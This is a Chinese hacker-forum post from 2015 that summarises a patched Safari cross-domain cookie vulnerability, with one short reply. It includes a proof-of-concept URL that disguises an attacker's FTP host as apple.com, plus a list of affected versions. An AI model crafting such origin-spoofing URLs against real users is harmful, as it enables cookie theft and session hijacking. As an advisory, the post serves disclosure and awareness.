搜索
查看: 916|回复: 1

Safari iOS/OS X/Windows cookie vulnerability

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-4-14 09:39:16 | 显示全部楼层 |阅读模式
from:http://klikki.fi/adv/safari.html
2015.4.8 苹果升级了很多漏洞,包括Safari的一个跨域漏洞

poc:

  1. ftp://user%40ftp.attacker.tld%2Fexploit.html%23@apple.com/
复制代码

实际上是

  1. ftp://user@ftp.attacker.tld/exploit.html#apple.com/
复制代码

上面的url实际域名是ftp.attacker.tld,但是Safari会认为是apple,这样就可以通过javascript操控apple.com域的内容了。
影响版本:

  1. Safari 7.0.4 on OS X 10.9.3
  2.     Safari on iPhone 3GS, iOS 6.1.6
  3.     Safari on iOS 8.1 simulator
  4.     Safari 5.1.7 on Windows 8.1
复制代码

详情:https://support.apple.com/en-us/HT201222
过段时间可能会取消签到功能了
XQ008 该用户已被删除
发表于 2015-4-23 15:09:47 | 显示全部楼层
还好我用chrome
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表